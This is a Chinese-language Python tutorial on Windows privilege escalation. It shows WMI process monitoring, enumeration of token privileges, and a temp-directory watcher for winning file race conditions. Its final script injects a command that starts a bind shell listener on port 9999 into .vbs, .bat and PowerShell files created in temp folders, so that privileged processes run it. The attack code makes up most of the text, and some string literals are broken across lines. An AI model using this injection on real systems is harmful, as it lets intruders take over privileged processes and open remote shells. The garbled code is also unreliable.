Python黑帽子：Windows系统提权

利用WMI监视进程

#coding=utf-8
import win32con
import win32api
import win32security

import wmi
import sys
import os

def log_to_file(message):
    fd = open("process_monitor_log.csv","ab")
    fd.write("%s
"%message)
    fd.close()

    return

#创建一个日志文件的头
log_to_file("Time,User,Executable,CommandLine,PID,Parent PID,Privileges")

#初始化WMI接口
c= wmi.WMI()

#创建进程监控器
process_watcher = c.Win32_Process.watch_for("creation") 

while True:
    try:
        new_process = process_watcher()

        proc_owner = new_process.GetOwner()
        proc_owner = "%s\%s"%(proc_owner[0],proc_owner[2])
        create_data = new_process.CreationDate
        executable = new_process.ExecutablePath
        cmdline = new_process.CommandLine
        pid = new_process.ProcessId
        parent_pid = new_process.ParentProcessId
        privileges = "N/A"

        process_log_message = "%s,%s,%s,%s,%s,%s,%s
"%(create_data,proc_owner,executable,cmdline,pid,parent_pid,privileges)

        print process_log_message

        log_to_file(process_log_message)

    except:
        pass

Windows系统的令牌权限

Windows系统的令牌是指：“一个包含进程或线程上下文安全信息的对象”。

1、SeBackupPrivilege：使得用户进程可以备份文件和目录，读取任何文件而无须关注它的访问控制列表（ACL）。

2、SeDebugPrivilege：使得用户进程可以调试其他进程，当然包括获取进程句柄以便将DLL或者代码插入到运行的进程中去。

3、SeLoadDriver：使得用户进程可以加载或者卸载驱动。

#coding=utf-8
import win32con
import win32api
import win32security

import wmi
import sys
import os

def get_process_privileges(pid):
    try:
        #获取目标进程的句柄
        hproc = win32api.OpenProcess(win32con.PROCESS_QUERY_INFORMATION,False,pid)

        #打开主进程的令牌
        htok = win32security.OpenProcessToken(hproc,win32con.TOKEN_QUERY)

        #解析已启用权限的列表
        privs = win32security.GetTokenInformation(htok,win32security.TokenPrivileges)

        #迭代每个权限并输出其中已经启用的
        priv_list = ""
        for i in privs:
            #检测权限是否已经启用
            if i[1] == 3:
                priv_list += "%s|" % win32security.LookupPrivilegeName(None,i[0])
    except Exception as e:
        priv_list = "N/A"

    return priv_list

def log_to_file(message):
    fd = open("process_monitor_log.csv","ab")
    fd.write("%s
"%message)
    fd.close()

    return

#创建一个日志文件的头
log_to_file("Time,User,Executable,CommandLine,PID,Parent PID,Privileges")

#初始化WMI接口
c= wmi.WMI()

#创建进程监控器
process_watcher = c.Win32_Process.watch_for("creation") 

while True:
    try:
        new_process = process_watcher()

        proc_owner = new_process.GetOwner()
        proc_owner = "%s\%s"%(proc_owner[0],proc_owner[2])
        create_data = new_process.CreationDate
        executable = new_process.ExecutablePath
        cmdline = new_process.CommandLine
        pid = new_process.ProcessId
        parent_pid = new_process.ParentProcessId
        privileges = get_process_privileges(pid)

        process_log_message = "%s,%s,%s,%s,%s,%s,%s
"%(create_data,proc_owner,executable,cmdline,pid,parent_pid,privileges)

        print process_log_message

        log_to_file(process_log_message)

    except:
        pass

赢得竞争

有些软件会把文件复制到一个临时目录下，等执行完之后就删除它。为了在这种条件下要进行权限漏洞的利用，必须在和目标程序执行脚本的竞争中占先。

当软件或计划任务创建文件的时候，必须能够在进程执行和删除文件之前插入代码。这里可以使用ReadDirectoryChangesW()函数来实现，可以让我们监控一个目录中的任何文件或者子目录的变化。

#coding=utf-8
import tempfile
import threading
import win32file
import win32con
import os

#这些是典型的临时文件所在的路径
dirs_to_monitor = ["C:\Windows\Temp",tempfile.gettempdir()]

#文件修改行为对应的常量
FILE_CREATED    = 1
FILE_DELETED    = 2
FILE_MODIFIED = 3
FILE_RENAMED_FROM = 4
FILE_RENAMED_TO = 5

def start_monitor(path_to_watch):
    #为每个监控器起一个线程
    FILE_LIST_DIRECTORY = 0x0001

    h_directory = win32file.CreateFile(
        path_to_watch,
        FILE_LIST_DIRECTORY,
        win32con.FILE_SHARE_READ | win32con.FILE_SHARE_WRITE | win32con.FILE_SHARE_DELETE,
        None,
        win32con.OPEN_EXISTING,
        win32con.FILE_FLAG_BACKUP_SEMANTICS,
        None)

    while 1:
        try:
            results = win32file.ReadDirectoryChangesW(
                h_directory,
                1024,
                True,
                win32con.FILE_NOTIFY_CHANGE_FILE_NAME | win32con.FILE_NOTIFY_CHANGE_DIR_NAME | win32con.FILE_NOTIFY_CHANGE_ATTRIBUTES | win32con.FILE_NOTIFY_CHANGE_SIZE | win32con.FILE_NOTIFY_CHANGE_LAST_WRITE | win32con.FILE_NOTIFY_CHANGE_SECURITY,
                None,
                None
                )

            for action,file_name in results:
                full_filename = os.path.join(path_to_watch,file_name)

                if action == FILE_CREATED:
                    print "[+] Created %s"%full_filename
                elif action == FILE_DELETED:
                    print "[+] Deleted %s"%full_filename
                elif action == FILE_MODIFIED:
                    print "[+] Modified %s"%full_filename

                    #输出文件内容
                    print "[vvv] Dumping contents..."

                    try:
                        fd = open(full_filename,"rb")
                        contents = fd.read()
                        fd.close()
                        print contents
                        print "[^^^] Dump complete."
                    except:
                        print "[!!!] Failed."
                elif action == FILE_RENAMED_FROM:
                    print "[>] Renamed from: %s"%full_filename
                elif action == FILE_RENAMED_TO:
                    print "[>] Renamed to: %s"%full_filename
                else:
                    print "[???] Unknown: %s"%full_filename
        except:
            pass

for path in dirs_to_monitor:
    monitor_thread = threading.Thread(target=start_monitor,args=(path,))
    print "Spawning monitoring thread for path: %s"%path
    monitor_thread.start()

代码插入

#coding=utf-8
import tempfile
import threading
import win32file
import win32con
import os

#这些是典型的临时文件所在的路径
dirs_to_monitor = ["C:\Windows\Temp",tempfile.gettempdir()]

#文件修改行为对应的常量
FILE_CREATED    = 1
FILE_DELETED    = 2
FILE_MODIFIED = 3
FILE_RENAMED_FROM = 4
FILE_RENAMED_TO = 5

file_types = {}

command = "C:\Windows\Temp\bhpnet.exe -l -p 9999 -c"
file_types['.vbs'] = ["
'bhpmarker
","
CreateObject("Wscript.Shell").Run("%s")
"%command]

file_types['.bat'] = ["
REM bhpmarker
","
%s
"%command]
file_types['.psl'] = ["
#bhpmarker","Start-Process "%s"
"%command]

#用于执行代码插入的函数
def inject_code(full_filename,extension,contents):
    #判断文件是否存在标记
    if file_types[extension][0] in contents:
        return

    #如果没有标记的话，那么插入代码并标记
    full_contents = file_types[extension][0]
    full_contents += file_types[extension][1]
    full_contents += contents

    fd = open(full_filename,"wb")
    fd.write(full_contents)
    fd.close()

    print "[o/] Injected code."

    return

def start_monitor(path_to_watch):
    #为每个监控器起一个线程
    FILE_LIST_DIRECTORY = 0x0001

    h_directory = win32file.CreateFile(
        path_to_watch,
        FILE_LIST_DIRECTORY,
        win32con.FILE_SHARE_READ | win32con.FILE_SHARE_WRITE | win32con.FILE_SHARE_DELETE,
        None,
        win32con.OPEN_EXISTING,
        win32con.FILE_FLAG_BACKUP_SEMANTICS,
        None)

    while 1:
        try:
            results = win32file.ReadDirectoryChangesW(
                h_directory,
                1024,
                True,
                win32con.FILE_NOTIFY_CHANGE_FILE_NAME | win32con.FILE_NOTIFY_CHANGE_DIR_NAME | win32con.FILE_NOTIFY_CHANGE_ATTRIBUTES | win32con.FILE_NOTIFY_CHANGE_SIZE | win32con.FILE_NOTIFY_CHANGE_LAST_WRITE | win32con.FILE_NOTIFY_CHANGE_SECURITY,
                None,
                None
                )

            for action,file_name in results:
                full_filename = os.path.join(path_to_watch,file_name)

                if action == FILE_CREATED:
                    print "[+] Created %s"%full_filename
                elif action == FILE_DELETED:
                    print "[+] Deleted %s"%full_filename
                elif action == FILE_MODIFIED:
                    print "[+] Modified %s"%full_filename

                    #输出文件内容
                    print "[vvv] Dumping contents..."

                    try:
                        fd = open(full_filename,"rb")
                        contents = fd.read()
                        fd.close()
                        print contents
                        print "[^^^] Dump complete."
                    except:
                        print "[!!!] Failed."

                    filename,extension = os.path.splitext(full_filename)

                    if extension in file_types:
                        inject_code(full_filename,extension,contents)

                elif action == FILE_RENAMED_FROM:
                    print "[>] Renamed from: %s"%full_filename
                elif action == FILE_RENAMED_TO:
                    print "[>] Renamed to: %s"%full_filename
                else:
                    print "[???] Unknown: %s"%full_filename
        except:
            pass

for path in dirs_to_monitor:
    monitor_thread = threading.Thread(target=start_monitor,args=(path,))
    print "Spawning monitoring thread for path: %s"%path
    monitor_thread.start()